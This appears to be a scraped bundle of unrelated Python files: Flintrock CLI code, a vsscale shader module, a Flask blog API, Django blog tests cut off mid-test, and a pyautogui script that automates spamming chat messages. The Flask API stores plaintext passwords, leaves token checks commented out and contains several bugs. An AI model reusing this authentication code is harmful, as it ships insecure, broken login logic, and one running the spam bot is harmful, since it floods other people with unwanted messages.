os.makedirs(os.path.dirname(config_file), exist_ok=True)
shutil.copyfile(
src=os.path.join(THIS_DIR, 'config.yaml.template'),
dst=config_file)
os.chmod(config_file, mode=0o644)
ret = click.launch(config_file, locate=locate)
if ret != 0:
raise Error(
"Flintrock could not launch an application to {action} "
"the config file at '{location}'. You may want to manually "
"find and edit this file."
.format(
action="locate" if locate else "edit",
location=config_file
)
)
def flintrock_is_in_development_mode() -> bool:
"""
Check if Flintrock was installed in development mode.
Use this function to toggle behavior that only Flintrock developers should
see.
"""
# This esoteric technique was pulled from pip.
# See: https://github.com/pypa/pip/pull/3258/files#diff-ab583908279e865537dec218246edcfcR310
for path_item in sys.path:
egg_link = os.path.join(path_item, 'Flintrock.egg-link')
if os.path.isfile(egg_link):
return True
else:
return False
def set_open_files_limit(desired_limit):
"""
On POSIX systems, set the open files limit to the desired number, unless
it is already equal to or higher than that.
Setting a high limit enables Flintrock to launch or interact with really
large clusters.
Background discussion: https://github.com/nchammas/flintrock/issues/81
"""
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft_limit < desired_limit:
if desired_limit > hard_limit:
warnings.warn(
"Flintrock cannot set the open files limit to {desired} "
"because the OS hard limit is {hard}. Going with {hard}. "
"You may have problems launching or interacting with "
"really large clusters."
.format(
desired=desired_limit,
hard=hard_limit),
category=RuntimeWarning,
stacklevel=2)
resource.setrlimit(
resource.RLIMIT_NOFILE,
(min(desired_limit, hard_limit), hard_limit))
def check_external_dependency(executable_name: str):
if shutil.which(executable_name) is None:
raise Error(
"Error: Flintrock could not find '{executable}' on your PATH. "
"Flintrock needs this executable to carry out the operation you "
"requested. Please install it and try again."
.format(
executable=executable_name
)
)
def main() -> int:
# Starting in Python 3.7, deprecation warnings are shown by default. We
# don't want to show these to end-users.
# See: https://docs.python.org/3/library/warnings.html#default-warning-filter
if not flintrock_is_in_development_mode():
warnings.simplefilter(action='ignore', category=DeprecationWarning)
set_open_files_limit(4096)
try:
try:
# We pass in obj so we can add attributes to it, like provider, which
# get shared by all commands.
# See: http://click.pocoo.org/6/api/#click.Context
cli(obj={})
except botocore.exceptions.NoCredentialsError:
raise Error(
"Flintrock could not find your AWS credentials. "
"You can fix this by providing your credentials "
"via environment variables or by creating a shared "
"credentials file.\n"
"For more information see:\n"
" * https://boto3.readthedocs.io/en/latest/guide/configuration.html#environment-variables\n"
" * https://boto3.readthedocs.io/en/latest/guide/configuration.html#shared-credentials-file"
)
except NothingToDo as e:
print(e)
return 0
except UsageError as e:
print(e, file=sys.stderr)
return 2
except Error as e:
print(e, file=sys.stderr)
return 1
| nchammas/flintrock | flintrock/flintrock.py | flintrock.py | py | 45,036 | python | en | code | 629 | github-code | 1 | [
{
"api_name": "sys._MEIPASS",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
... |
25515562168 | import pyautogui, time
print("A simple text spam bot that types a massage and presses enter")
print("word mode =w copy and paste mode =c self enter mode =t")
mode = input("word or copy and paste mode? ")
def modet():
text = input("Entere a text to spam: ")
num = int(input("Enter a num:"))
time.sleep(5)
for num in range(num):
pyautogui.typewrite(text)
pyautogui.press("enter")
def modec():
num = int(input("Enter a num:"))
time.sleep(5)
f = open("copy_and_paste.txt")
fa = f.read()
for num in range(num):
pyautogui.typewrite(fa)
pyautogui.press("enter")
def modep():
time.sleep(5)
f = open("word.txt")
for word in f:
pyautogui.typewrite(word)
pyautogui.press("enter")
if mode == "c":
modec()
elif mode == "w":
modep()
elif mode == "t":
modet()
else:
print("Only type c or w")
| Kn0spi/Spam_Bot | spam_bot.py | spam_bot.py | py | 1,084 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pyautogui.typewrite",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pyautogui.press",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_... |
5059822920 | from __future__ import annotations
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import TYPE_CHECKING, Any, overload
from vstools import (
MISSING, CustomRuntimeError, FileWasNotFoundError, MissingT, core, expect_bits, get_user_data_dir, get_video_format,
inject_self, join, vs
)
from .base import ShaderFileBase, ShaderFileCustom
from .helpers import GenericScaler
__all__ = [
'PlaceboShader',
'ShaderFile',
'FSRCNNXShader', 'FSRCNNXShaderT'
]
class PlaceboShaderMeta(GenericScaler):
shader_file: str | Path | ShaderFile
@dataclass
class PlaceboShaderBase(PlaceboShaderMeta):
"""Base placebo shader class."""
chroma_loc: int | None = field(default=None, kw_only=True)
matrix: int | None = field(default=None, kw_only=True)
trc: int | None = field(default=None, kw_only=True)
linearize: int | None = field(default=None, kw_only=True)
sigmoidize: int | None = field(default=None, kw_only=True)
sigmoid_center: float | None = field(default=None, kw_only=True)
sigmoid_slope: float | None = field(default=None, kw_only=True)
lut_entries: int | None = field(default=None, kw_only=True)
antiring: float | None = field(default=None, kw_only=True)
filter_shader: str | None = field(default=None, kw_only=True)
clamp: float | None = field(default=None, kw_only=True)
blur: float | None = field(default=None, kw_only=True)
taper: float | None = field(default=None, kw_only=True)
radius: float | None = field(default=None, kw_only=True)
param1: float | None = field(default=None, kw_only=True)
param2: float | None = field(default=None, kw_only=True)
def __post_init__(self) -> None:
super().__post_init__()
if not hasattr(self, 'shader_file'):
raise CustomRuntimeError('You must specify a "shader_file"!', self.__class__)
@inject_self
def scale( # type: ignore
self, clip: vs.VideoNode, width: int, height: int, shift: tuple[float, float] = (0, 0), **kwargs: Any
) -> vs.VideoNode:
output, _ = expect_bits(clip, 16)
fmt = get_video_format(output)
if fmt.num_planes == 1:
if width > output.width or height > output.height:
output = output.resize.Point(format=vs.YUV444P16)
else:
for div in (4, 2):
if width % div == 0 and height % div == 0:
blank = core.std.BlankClip(output, output.width // div, output.height // div, vs.GRAY16)
break
else:
blank = output.std.BlankClip(vs.GRAY16)
output = join(output, blank, blank)
kwargs |= {
'shader': str(
self.shader_file()
if isinstance(self.shader_file, ShaderFile) else
ShaderFile.CUSTOM(self.shader_file)
),
'chroma_loc': self.chroma_loc, 'matrix': self.matrix,
'trc': self.trc, 'linearize': self.linearize,
'sigmoidize': self.sigmoidize, 'sigmoid_center': self.sigmoid_center, 'sigmoid_slope': self.sigmoid_slope,
'lut_entries': self.lut_entries,
'antiring': self.antiring, 'filter': self.filter_shader, 'clamp': self.clamp,
'blur': self.blur, 'taper': self.taper, 'radius': self.radius,
'param1': self.param1, 'param2': self.param2,
} | kwargs | {
'width': output.width * ceil(width / output.width),
'height': output.height * ceil(height / output.height)
}
if not kwargs['filter']:
kwargs['filter'] = 'box' if fmt.num_planes == 1 else 'ewa_lanczos'
if not Path(kwargs['shader']).exists():
try:
kwargs['shader'] = str(ShaderFile.CUSTOM(kwargs['shader']))
except FileWasNotFoundError:
...
output = output.placebo.Shader(**kwargs)
return self._finish_scale(output, clip, width, height, shift)
@dataclass
class PlaceboShader(PlaceboShaderBase):
shader_file: str | Path
class ShaderFile(ShaderFileBase):
"""Default shader files shipped with vsscale."""
if not TYPE_CHECKING:
CUSTOM = 'custom'
FSRCNNX_x8 = 'FSRCNNX_x2_8-0-4-1.glsl'
FSRCNNX_x16 = 'FSRCNNX_x2_16-0-4-1.glsl'
FSRCNNX_x56 = 'FSRCNNX_x2_56-16-4-1.glsl'
SSIM_DOWNSCALER = 'SSimDownscaler.glsl'
SSIM_SUPERSAMPLER = 'SSimSuperRes.glsl'
@overload
def __call__(self) -> Path:
...
@overload
def __call__(self: ShaderFileCustom, file_name: str | Path) -> Path: # type: ignore
...
def __call__(self, file_name: str | Path | MissingT = MISSING) -> Path:
"""Get a path from the shader member, name or path."""
if self is not ShaderFile.CUSTOM:
return Path(__file__).parent / 'shaders' / self.value
if file_name is MISSING: # type: ignore
raise TypeError("ShaderFile.__call__() missing 1 required positional argument: 'file_name'")
file_name, cwd = Path(file_name), Path.cwd()
assets_dirs = [
file_name,
cwd / file_name,
cwd / '.shaders' / file_name,
cwd / '_shaders' / file_name,
cwd / '.assets' / file_name,
cwd / '_assets' / file_name
]
for asset_dir in assets_dirs:
if asset_dir.is_file():
return asset_dir
mpv_dir = get_user_data_dir().parent / 'Roaming' / 'mpv' / 'shaders' / file_name
if mpv_dir.is_file():
return mpv_dir
raise FileWasNotFoundError(f'"{file_name}" could not be found!', str(ShaderFile.CUSTOM))
class FSRCNNXShader(PlaceboShaderBase):
"""Defaults FSRCNNX shaders shipped with vsscale."""
shader_file = ShaderFile.FSRCNNX_x56
@dataclass
class x8(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x8
@dataclass
class x16(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x16
@dataclass
class x56(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x56
FSRCNNXShaderT = type[PlaceboShaderBase] | PlaceboShaderBase # type: ignore
| jiaolovekt/HPCENC | deps/vs-plugins/vsscale/shaders.py | shaders.py | py | 6,240 | python | en | code | 11 | github-code | 1 | [
{
"api_name": "helpers.GenericScaler",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "dataclasses.field",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "dataclasses.fiel... |
35385777411 | from ast import Return
from enum import auto
import json
from lib2to3.pgen2 import token
from multiprocessing.util import abstract_sockets_supported
from textwrap import wrap
from flask import Flask, jsonify, request, make_response
from SQLalchemy import Autor, Postagem, db
import jwt
from datetime import datetime,timedelta
app = Flask(__name__)
# postagens = [
# {
# 'título': 'Minha História',
# 'autor': 'Amanda Dias'
# },
# {
# 'título': 'Novo Dispositivo Sony',
# 'autor': 'Howard Stringer'
# },
# {
# 'título': 'Lançamento do Ano',
# 'autor': 'Jeff Bezos'
# },
# ]
# # Rota padrão - GET https://localhost:5000
# @app.route('/')
# def obter_postagens():
# return jsonify(postagens)
# # Obter postagem por id - GET https://localhost:5000/postagem/1
# @app.route('/postagem/<int:indice>', methods=['GET'])
# def obter_postagem_por_indice(indice):
# return jsonify(postagens[indice])
# # Criar uma nova postagem - POST https://localhost:5000/postagem
# @app.route('/postagem', methods=['POST'])
# def nova_postagem():
# postagem = request.get_json()
# postagens.append(postagem)
# return jsonify(postagem, 200)
# # Alterar uma postagem existente - PUT https://localhost:5000/postagem/1
# @app.route('/postagem/<int:indice>', methods=['PUT'])
# def alterar_postagem(indice):
# postagem_alterada = request.get_json()
# postagens[indice].update(postagem_alterada)
# return jsonify(postagens[indice], 200)
# # Excluir uma postagem - DELETE - https://localhost:5000/postagem/1
# # def excluir_postagem(indice):
# try:
# if postagens[indice] is not None:
# del postagens[indice]
# return jsonify(f'Foi excluído a postagem {postagens[indice]}', 200)
# except:
# return jsonify('Não foi possível encontrar a postagem para exclusão', 404)
#CONSTRUINDO API COM ESTRUTURA DE BANCO DE DADOS
#POSTMAN & DBBROWSER
# Rota para Token obrigatório http://localhost:5000/http://localhost:5000
def token_obrigatorio(f):
@wrap(f)
def decorated(*args,**kargs):
token:None
#verificar se um token foi enviado
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'mensagem':'Token não encontrado'},401)
#caso verdadeiro consultar bd
try:
resultado = jwt.decode(token,app.config['SECRET KEY'])
autor = Autor.query.filter_by(id_autor=resultado['id_autor']).first()
except:
return jsonify({'mensagem':'Token é invalido'},401)
return f(autor,*args,**kargs)
return decorated
# Rota para login http://localhost:5000/login
@app.route('/login')
def login():
auth = request.authorization
if not auth or not auth.username or not auth.password:
return make_response('Login Invalido',401,{'www-Authenticate':'Basic realm=Login Obrigatório"'})
usuario = Autor.query.filter_by(nome=auth.username).first()
if not usuario:
return make_response('Login invalido',401,{'www-Authenticate':'Basic realm=Login Obrigatório"'})
if auth.password == usuario.senha:
token = jwt.encode({'id_autor': usuario.id_autor,'exp':datetime.utcnow()+datetime.timedelta(minutes=30)},app.config['GLAUBER@2907'])
return jsonify({'token':token})
return make_response('Login Invalido', 401,{'www-Authenticate': 'Basic realm=Login Obrigatório"'})
#Rota para consulta autores GET
@app.route('/autores')
#@token_obrigatorio
def obter_autores(autor):
autores = Autor.query.all()
lista_de_autores = []
for autor in autores:
autor_atual = {}
autor_atual['id_autor'] = autor.id_autor
autor_atual['nome'] = autor.nome
autor_atual['email'] = autor.email
lista_de_autores.append(autor_atual)
return jsonify({'autores': lista_de_autores})
#Rota para consulta autores GET p/ Id
@app.route('/autores/<int:id_autor>', methods=['GET'])
#@token_obrigatorio
def obter_autor_por_id(autor,id_autor):
autor = Autor.query.filter_by(id_autor=id_autor).first
if not autor:
return jsonify(f'Autor não encontrado')
autor_atual = {}
autor_atual['id_autor'] = autor.id_autor
autor_atual['nome'] = autor.nome
autor_atual['email'] = autor.email
return jsonify({'autor': autor_atual})
#Rota para inser~]ap de novo autor
@app.route('/autores', methods=['POST'])
#@token_obrigatorio
def novo_autor(autor):
novo_autor = request.get_json()
autor = Autor(
nome=novo_autor['nome'], senha=novo_autor['senha'], email=novo_autor['email'])
db.session.add(autor)
db.commit()
return jsonify({'mensagem': 'Usuario criado com sucesso'}, 200)
@app.route('/autores/<int:id_autor>', methods=['PUT'])
#@token_obrigatorio
def alterar_autor(autor,id_autor):
usuario_a_alterar = request.get_json()
autor = Autor.query.filter_by(id_autor=id_autor).first()
if not autor:
return jsonify({'Mensagem': 'Este usuario nao foi encontrado'})
try:
if usuario_a_alterar['nome']:
autor.nome = usuario_a_alterar['nome']
except:
pass
try:
if usuario_a_alterar['email']:
autor.email = usuario_a_alterar['email']
except:
pass
try:
if usuario_a_alterar['senha']:
autor.senha = usuario_a_alterar['senha']
except:
pass
db.session.commit()
return jsonify({'Mensagem:' 'Usuario alterado com sucesso!'})
@app.route('/autores/<int:id_autor>', methods=['DELETE'])
def excluir_autor(id_autor):
autor_existente = Autor.query.filter_by(id_autor=id_autor).first()
if not autor_existente:
return jsonify({'Mensagem': 'Este autor não existe'})
db.session.delete(autor_existente)
db.commit()
# Construindo a estrutura para Postagens
@app.route('/postagens') # Metodo GET p/ postagens
def obterpostagens():
postagens = Postagem.query.all()
lista_de_postagens = []
for postagem in postagens:
postagem_atual = {}
postagem_atual['id_postagem'] = postagem.id_postagem
postagem_atual['titulo'] = postagem.titulo
postagem_atual['id_autor'] = postagem.id_autor
lista_de_postagens.append(postagem_atual)
return jsonify({'postagens': lista_de_postagens})
# Metodo GET com id para obter postagens por id
@app.route('/postagens/<int:id_postagem>', methods=['GET'])
def obterpostagem_id(id_postagem):
postagem1 = Postagem.query.filter_by(id_postagem=id_postagem).first
if not postagem1:
return jsonify(f'Postagem não encontrada')
postagem_atual = {}
postagem_atual['id_postagem'] = Postagem.id_postagem
postagem_atual['titulo'] = Postagem.titulo
postagem_atual['id_autor'] = Postagem.id_autor
return jsonify(f'Voce buscou pela postagem {postagem_atual}')
#Metodo POST para criação de novas postagens
@app.route('/postagens', methods=['POST'])
def novapostagem():
nova_postagem = request.get_json()
postagem = Postagem(titulo=nova_postagem['titulo'])
db.session.add(postagem)
db.commit()
return jsonify({'mensagem':'usuario cadastrado com sucesso'},200)
#Metodo para alterar uma postagem
@app.route('/postagens/<int:id_postagem>',methods=['PUT'])
def alterarpostagem(id_postagem):
postagem_a_alter = request.get_json()
postagem = Postagem.query.filter_by(id_postagem).first()
if not postagem:
return jsonify({'Mensagem':'Esta postagem não existe'})
postagem_a_alter['titulo']
Postagem.titulo = postagem_a_alter
db.session()
return jsonify({'Mesangem':'Postagem alterada com sucesso!'})
#Metodo Delete para postagens
@app.route('/postagens/<int:id_postagem>',methods=['DELETE'])
def deletarpostagem(id_postagem):
postagem_existente = Postagem.query.filter_by(id_postagem=id_postagem).first
if not postagem_existente:
jsonify({'mensagem':'postagem não encontrada'})
db.session.delete(postagem_existente)
return jsonify({'mensagem':'postagem excluida com sucesso!'})
#coments
if __name__ == '__main__':
app.run(port=5000, host='localhost', debug=True) | Glauberorionslt/apiblog-devaprender | app.py | app.py | py | 8,266 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lib2to3.pgen2.token",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "flask.request.headers",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "flask.requ... |
21619963342 | import threading
import time
import urllib
from collections import deque
import discord
import cogs.voice_lib.mkvparse as mkvparse
import logging
# dumb buffer stuff
import io, queue, subprocess
class Handler(mkvparse.MatroskaHandler):
def __init__(self, packet_buffer):
self.packet_buffer = packet_buffer
# dispatched for each frame by mkvparse
def frame(self, track_id, timestamp, data, more_laced_frames, duration, keyframe, invisible, discardable):
while len(self.packet_buffer) > 10000:
time.sleep(1) # block until packet buffer size is reduced
self.packet_buffer.append(data)
class Buffer:
def __init__(self, raw_packets):
self.raw_packets = raw_packets
self.packets = deque()
self.handler = Handler(self.packets)
self.parser = None
def parse_opus(self):
self.parser = threading.Thread(target=mkvparse.mkvparse, args=(self, self.handler))
self.parser.daemon = True
self.parser.start()
def wait_until_ready(self):
while len(self.packets) < 25 and self.parser.is_alive():
time.sleep(0.1)
def read(self, n):
# Called by mkvparse
try:
return self.raw_packets.read(n)
except ConnectionError as e:
raise e
# this is a little over-engineered -- we only call self.read() with a fixed value
# so a lot about this could be simplified if it turns out to be a performance problem
class StreamBuffer(io.BufferedIOBase):
def __init__(self, file, *args, **kwargs):
super(StreamBuffer, self).__init__(*args, **kwargs)
self.CHUNK_SIZE = 1024 * 16
self.MAX_QUEUE_SIZE = 160 * 4 # 10 MiB max per buffer
self.file = file
self.finished_downloading = False
self.current_buffer = io.BytesIO()
self.buffers = queue.Queue(self.MAX_QUEUE_SIZE)
self.downloader = threading.Thread(target=self.top_up_buffers, args=())
self.downloader.daemon = True
self.downloader.start()
def read(self, size=-1):
if size is None or size < 0:
size = float('inf')
total = 0
data = []
size_remaining = size if isinstance(size, int) else -1
while total < size:
x = self.current_buffer.read(size_remaining)
total += len(x)
size_remaining -= len(x)
data.append(x)
if len(x) == 0:
while True:
try:
self.current_buffer = self.buffers.get(timeout=0.2)
break
except queue.Empty:
if self.finished_downloading:
return b''.join(data)
return b''.join(data)
def top_up_buffers(self):
while not self.finished_downloading:
data = self.file.read(self.CHUNK_SIZE)
if data == b'':
self.finished_downloading = True
break
self.buffers.put(io.BytesIO(data))
logging.info("finished downloading")
def fileno(self) -> int:
raise OSError()
def register_sink(self, stdin):
self.sink = threading.Thread(target=self._register_sink, args=(stdin,))
self.sink.daemon = True
self.sink.start()
def _register_sink(self, stdin):
while True:
data = self.read(self.CHUNK_SIZE)
if data == b'':
logging.info("Finished playing song")
stdin.close()
break
stdin.write(data)
class Source(discord.AudioSource):
def __init__(self, file, song=None, buffer=Buffer):
self.buffer = buffer(file)
self.buffer.parse_opus()
self.song = song
def read(self):
self.buffer.wait_until_ready()
try:
frame = self.buffer.packets.popleft()
except IndexError:
frame = b''
return frame
def is_opus(self):
return True
def get_source(song, use_opus=True):
song.refresh_info()
if song.codec != 'opus' or not use_opus:
buf = StreamBuffer(urllib.request.urlopen(song.media_url))
# wait until buffer is non-empty (takes about a second)
# if we don't do this, discord glitches and the first few seconds are sped up
while buf.buffers.empty() and not buf.finished_downloading:
time.sleep(0.1)
source = discord.FFmpegPCMAudio(subprocess.PIPE, pipe=True)
buf.register_sink(source._process.stdin)
else:
file = urllib.request.urlopen(song.media_url)
source = Source(file, song)
return source
| biglizards/butty | cogs/voice_lib/parser.py | parser.py | py | 4,677 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "cogs.voice_lib.mkvparse.MatroskaHandler",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "cogs.voice_lib.mkvparse",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 23,
"usage_type": "call"
},
{
"a... |
29673261055 | # -*- coding: utf-8 -*-
"""Server for the Raspi Webapp
Examples:
- get json with curl -> curl -X POST http://0.0.0.0:2828/api/v1/getCrashInfo -d data/1.json
- get image with curl -> curl -X POST http://0.0.0.0:2828/api/v1/getCrashImage -o received_img.png
"""
import sys
sys.path.append('..')
import os
import signal
import time
from sanic import Sanic
from sanic.response import json
from sanic.response import file
import helper.log_helper as logger
import config
from damage_image import DamageImage
from data_parser import DataParser
app = Sanic()
app.name = "CrashSimulationAsimov"
log = logger.get(False, "Server")
# SIGINT handler (when pressing Ctrl+C)
def signal_int_handler(sig, frame):
print("Ctrl+C Pressed. Exit...")
sys.exit(0)
# Routes
# GET - index.html
@app.route('/', methods=['GET'],)
async def index(request):
return await file(os.path.join(os.path.dirname(__file__), 'frontend/index.html'))
# GET - favicon.ico
@app.route('/favicon.ico', methods=['GET'],)
async def favicon(request):
return await file(os.path.join(os.path.dirname(__file__), 'frontend/favicon.ico'))
# POST request 1 - returns JSON {"impactAngle": degrees, "offsetMaximumForce": millisecond}
@app.route('/api/v1/getCrashInfo', methods=['POST',])
async def crash_info(request):
''' crash info parses the crash record and returns a JSON object '''
log.info("Handling '/api/v1/getCrashInfo'")
angle, max_force_offset, _, _, _ = DataParser().parse_input_data(request.body.decode('utf8'))
return json({'impactAngle': angle, 'offsetMaximumForce': max_force_offset})
# POST request 2 - returns a rendered crash image (PNG)
@app.route('/api/v1/getCrashImage', methods=['POST',])
async def crash_image(request):
''' crash image parses the crash record and returns a Image '''
log.info("Handling '/api/v1/getCrashImage'")
customOffset = 0
try:
customOffset = int(request.args.get('timeOffsetMS'))
except Exception as e:
log.error(e)
log.info("Set customOffset: " + str(customOffset) + "ms")
angle_impact, max_force, damage_id, crash_time, max_force_offset = DataParser().parse_input_data(request.body.decode('utf8'), custom_offset=customOffset)
d = DamageImage(angle_impact, max_force, damage_id, crash_time, max_force_offset)
return await file(d.get_image())
# POST request 3 - returns a rendered crash image list (PNG)
@app.route('/api/v1/play', methods=['POST',])
async def image_list(request):
''' crash image parses the crash record and returns a Image List '''
log.info("Handling '/api/v1/play'")
images = []
data = request.body.decode('utf-8')
for i in range(-8000, 8000, 1000):
angle_impact, max_force, damage_id, crash_time, max_force_offset = DataParser().parse_input_data(data, custom_offset=i)
d = DamageImage(angle_impact, max_force, damage_id, crash_time, max_force_offset)
images.append(d.get_image())
return json({"data": images})
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_int_handler)
##app.add_task(task(app))
app.static('/frontend', './frontend')
app.static('/images', './images')
app.run(host=config.host, port=config.port, debug=False, access_log=False)
| tschibu/starthack-asimov | src/server.py | server.py | py | 3,244 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sanic.Sanic",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "helper.log_helper.get",
"... |
72860061154 | from bs4 import BeautifulSoup
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import Post, Category, Tag
# <6. 테스트 주도 개발>
# pip install beautifulsoup4 로 beautifulsoup4 설치하고 사용
# 1. python manage.py test 테스트 하는 명령어
# 2. blog/test.py에 TestCase를 상속받고 이름이 'Test'로 시ㅔㅛ작하는 클래스를 정의 (TestView)
# 2. TestView에 'test'로 시작하는 함수를 정의 (test_post_list, test_post_detail)
class TestView(TestCase):
# 테스트를 실행하기 전에 공통적으로 수행할 어떤 작업의 내용을 넣어줌
def setUp(self):
self.client = Client() # Client 클래스를 통해 실제 경로의 view와 매치해서 테스트를 진행
self.user_james = User.objects.create_user(username='James', password='somepassword')
self.user_trump = User.objects.create_user(username='Trump', password='somepassword')
self.category_programming = Category.objects.create(name='programming', slug='programming')
self.category_culture = Category.objects.create(name='culture', slug='culture')
self.tag_python_kor = Tag.objects.create(name='파이썬 공부', slug='파이썬-공부')
self.tag_python = Tag.objects.create(name='python', slug='python')
self.tag_hello = Tag.objects.create(name='hello', slug='hello')
# 3.1. 포스트(게시물)가 3개 존재하는 경우엔
self.post_001 = Post.objects.create(
title='첫 번째 포스트 입니다.',
content='Hello world. We are the world',
author=self.user_james,
category=self.category_programming,
)
self.post_001.tags.add(self.tag_hello)
self.post_002 = Post.objects.create(
title='두 번째 포스트 입니다.',
content='1등이 전부가 아니잖아요',
author=self.user_trump,
category=self.category_culture,
)
self.post_003 = Post.objects.create(
title='세 번째 포스트 입니다.',
content='세번째 포스트 입니다.',
author=self.user_trump,
)
self.post_003.tags.add(self.tag_python)
self.post_003.tags.add(self.tag_python_kor)
def navbar_test(self, soup):
# 1.4. 네비게이션 바가 있다.
navbar = soup.nav
# 1.5. 네비게이션바에 Blog, About Me 라는 문구가 있다.
self.assertIn('Blog', navbar.text) # 네비게이션 바의 내용과 같은 것이 아니고 부분적으로 들어있으니 assertIn
self.assertIn('About Me', navbar.text)
logo = navbar.find('a', text='Internet Programming')
self.assertEqual(logo.attrs['href'], '/')
logo = navbar.find('a', text='Home')
self.assertEqual(logo.attrs['href'], '/')
logo = navbar.find('a', text='Blog')
self.assertEqual(logo.attrs['href'], '/blog/')
logo = navbar.find('a', text='About Me')
self.assertEqual(logo.attrs['href'], '/about_me/')
def category_test(self, soup):
category = soup.find('div', id='categories-card')
self.assertIn('Categories', category.text)
self.assertIn(f'{self.category_programming.name} ({self.category_programming.post_set.count()})', category.text)
self.assertIn(f'{self.category_culture.name} ({self.category_culture.post_set.count()})', category.text)
self.assertIn(f'미분류 (1)', category.text)
def test_category_page(self):
# 카테고리 페이지 url로 불러오기
response = self.client.get(self.category_programming.get_absolute_url())
self.assertEqual(response.status_code, 200)
# beautifulsoup4로 html을 parser하기
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
# 카테고리 name을 포함하고 있는지
self.assertIn(self.category_programming.name, soup.h1.text)
# 카테고리에 포함된 post만 포함하고 있는지
main_area = soup.find('div', id='main-area')
self.assertIn(self.category_programming.name, main_area.text)
self.assertIn(self.post_001.title, main_area.text)
self.assertNotIn(self.post_002.title, main_area.text)
self.assertNotIn(self.post_003.title, main_area.text)
def test_tag_page(self):
# 카테고리 페이지 url로 불러오기
response = self.client.get(self.tag_hello.get_absolute_url())
self.assertEqual(response.status_code, 200)
# beautifulsoup4로 html을 parser하기
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
# 카테고리 name을 포함하고 있는지
self.assertIn(self.tag_hello.name, soup.h1.text)
# 카테고리에 포함된 post만 포함하고 있는지
main_area = soup.find('div', id='main-area')
self.assertIn(self.tag_hello.name, main_area.text)
self.assertIn(self.post_001.title, main_area.text)
self.assertNotIn(self.post_002.title, main_area.text)
self.assertNotIn(self.post_003.title, main_area.text)
def test_create_post(self):
# 1.1. 포스트 목록 페이지를 가져온다.
response = self.client.get('/blog/create_post/')
self.assertNotEqual(response.status_code, 200)
self.client.login(username='Trump', password='somepassword')
response = self.client.get('/blog/create_post/') # 목록페이지에 대해 요청된 결과가 들어있음. 정상 작동이면 200 반환
# 1.2. 정상적으로 페이지가 로드된다.
self.assertEqual(response.status_code, 200) # http에서 응답받는 값과 코드.
# 1.3. 페이지 타이틀이 'Blog'이다.
soup = BeautifulSoup(response.content, 'html.parser') # BeautifulSoup는 페이지 분석을 하는 라이브러리고, 그 일을 수행하는 것은 parser
self.assertEqual(soup.title.text, 'Create Post - Blog')
main_area = soup.find('div', id="main-area")
self.assertIn('Create new Post', main_area.text)
self.client.post('/blog/create_post/',
{
'title': "Post form 만들기",
'content': "Post form 페이지 만들기",
})
last_post = Post.objects.last()
self.assertEqual(last_post.title, "Post form 만들기")
self.assertEqual(last_post.author.username, 'Trump')
# 포스트 목록 페이지 테스트 코드
def test_post_list(self):
# 1.1. 포스트 목록 페이지를 가져온다.
response = self.client.get('/blog/') # 목록페이지에 대해 요청된 결과가 들어있음. 정상 작동이면 200 반환
# 1.2. 정상적으로 페이지가 로드된다.
self.assertEqual(response.status_code, 200) # http에서 응답받는 값과 코드.
# 1.3. 페이지 타이틀이 'Blog'이다.
soup = BeautifulSoup(response.content, 'html.parser') # BeautifulSoup는 페이지 분석을 하는 라이브러리고, 그 일을 수행하는 것은 parser
self.assertEqual(soup.title.text, 'Blog')
self.navbar_test(soup)
self.category_test(soup)
# 3.3. main-area에 포스트 3개의 제목이 존재한다.
main_area = soup.find('div', id="main-area")
# 3.4. '아직 게시물이 없습니다.'라는 문구는 더이상 나타나지 않는다.
self.assertNotIn('아직 게시물이 없습니다.', main_area.text)
post_001_card = main_area.find('div', id='post-1')
self.assertIn(self.post_001.title, post_001_card.text)
self.assertIn(self.post_001.category.name, post_001_card.text)
self.assertIn(self.tag_hello.name, post_001_card.text)
self.assertNotIn(self.tag_python.name, post_001_card.text)
self.assertNotIn(self.tag_python_kor.name, post_001_card.text)
post_002_card = main_area.find('div', id='post-2')
self.assertIn(self.post_002.title, post_002_card.text)
self.assertIn(self.post_002.category.name, post_002_card.text)
self.assertNotIn(self.tag_hello.name, post_002_card.text)
self.assertNotIn(self.tag_python.name, post_002_card.text)
self.assertNotIn(self.tag_python_kor.name, post_002_card.text)
post_003_card = main_area.find('div', id='post-3')
self.assertIn(self.post_003.title, post_003_card.text)
self.assertIn('미분류', post_003_card.text)
self.assertNotIn(self.tag_hello.name, post_003_card.text)
self.assertIn(self.tag_python.name, post_003_card.text)
self.assertIn(self.tag_python_kor.name, post_003_card.text)
self.assertIn(self.user_james.username.upper(), main_area.text)
self.assertIn(self.user_trump.username.upper(), main_area.text)
# 포스트에 게시물이 하나도 없는 경우
